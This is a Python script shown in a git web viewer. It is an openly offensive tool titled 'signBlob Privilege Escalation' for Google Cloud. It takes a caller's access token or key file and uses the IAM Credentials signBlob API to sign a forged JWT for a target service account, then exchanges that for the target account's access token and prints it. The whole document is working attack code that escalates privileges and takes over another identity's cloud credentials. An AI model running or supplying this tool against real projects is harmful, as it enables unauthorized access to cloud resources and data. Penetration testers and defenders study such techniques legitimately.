summaryrefslogtreecommitdiff
path: root/signedblob-privesc.py
blob: aff64283b3241ea3f289ad5113f40c6005121584 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/env python3

import base64
import json
import argparse
import requests
import sys
from datetime import datetime, timedelta
from google.oauth2 import service_account
import google.auth.transport.requests

def b64Encode(data: bytes):
    return base64.urlsafe_b64encode(data).decode('utf-8')

def createJwt(service_account_email):
    now = int(datetime.now().timestamp())
    header = {"alg": "RS256", "typ": "JWT"}
    payload = {
        "iss": service_account_email,
        "scope": "https://www.googleapis.com/auth/cloud-platform",
        "aud": "https://oauth2.googleapis.com/token",
        "exp": now + 3600,
        "iat": now
    }
    header_b64 = b64Encode(json.dumps(header).encode())
    payload_b64 = b64Encode(json.dumps(payload).encode())
    return f"{header_b64}.{payload_b64}"

def getTokenFromKeyFile(keyfile_path):
    scopes = ['https://www.googleapis.com/auth/cloud-platform']
    creds = service_account.Credentials.from_service_account_file(keyfile_path, scopes=scopes)
    auth_req = google.auth.transport.requests.Request()
    creds.refresh(auth_req)
    return creds.token

def executeSignBlob(bearer_token, target_sa):
    print("[*] Constructing a JWT")
    unsigned_jwt = createJwt(target_sa)
    
    print("[*] Getting a signed Blob")
    sign_url = f"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/{target_sa}:signBlob"
    headers = {
        "Authorization": f"Bearer {bearer_token}",
        "Content-Type": "application/json"
    }
    
    data = {"payload": b64Encode(unsigned_jwt.encode())}
    
    resp = requests.post(sign_url, json=data, headers=headers)
    
    if resp.status_code != 200:
        print(f"[!] signBlob failed (Status {resp.status_code}): {resp.text}")
        return

    signature = resp.json()['signedBlob']
    
    print(f"[*] Getting Access Token")
    assertion = f"{unsigned_jwt}.{signature}"
    
    token_url = "https://oauth2.googleapis.com/token"
    token_data = {
        "grant_type": "urn:ietf:params:oauth:grant-type:jwt-bearer",
        "assertion": assertion
    }
    
    token_resp = requests.post(token_url, data=token_data)
    return token_resp.json()

def main():
    parser = argparse.ArgumentParser(description="signBlob Privilege Escalation")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument("-t", "--token", help="Caller's Access Token string")
    group.add_argument("-f", "--token-file", help="Path to file containing Access Token")
    group.add_argument("-k", "--key-file", help="Path to Service Account JSON key file")
    
    parser.add_argument("-s", "--target", required=True, help="Target Service Account Email")
    args = parser.parse_args()

    caller_token = None
    if args.token:
        caller_token = args.token
    elif args.token_file:
        with open(args.token_file, 'r') as f:
            caller_token = f.read().strip()
    elif args.key_file:
        caller_token = getTokenFromKeyFile(args.key_file)

    if not caller_token:
        print("[!] Could not retrieve a valid caller token.")
        sys.exit(1)

    result = executeSignBlob(caller_token, args.target)
    if result:
        print("[*] Got Token:")
        print(json.dumps(result, indent=2))

if __name__ == "__main__":
    main()